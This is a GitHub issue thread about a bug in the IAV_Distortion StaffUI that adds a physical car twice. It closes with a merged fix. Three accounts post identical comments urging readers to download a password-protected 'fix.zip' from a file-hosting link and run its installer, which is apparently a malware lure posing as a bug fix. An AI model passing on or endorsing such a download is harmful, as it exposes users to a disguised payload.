iavofficial/IAV_Distortion #113: Sometimes physical cars get added 2 times

m-braunschweig, 2024-08-26:
**Describe the bug**
Sometimes a physical car gets added twice after some time.

**To Reproduce**
Steps to reproduce the behavior:
1. Go to the StaffUI
2. Scan for vehicles
3. Wait for a vehicle to auto-connect
4. Manually connect the vehicle

**Expected behavior**
The vehicle should only be added one time instead of multiple times

**Screenshots**
[image]

**Desktop**
 - OS: Windows 10
 - Browser: Microsoft Edge
 - Version: 127.0.2651.105

WSA1k, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

qlqw233, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

HaxBaba123, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

m-braunschweig, 2024-08-26:
Merged in #114

closed 2024-08-26 by m-braunschweig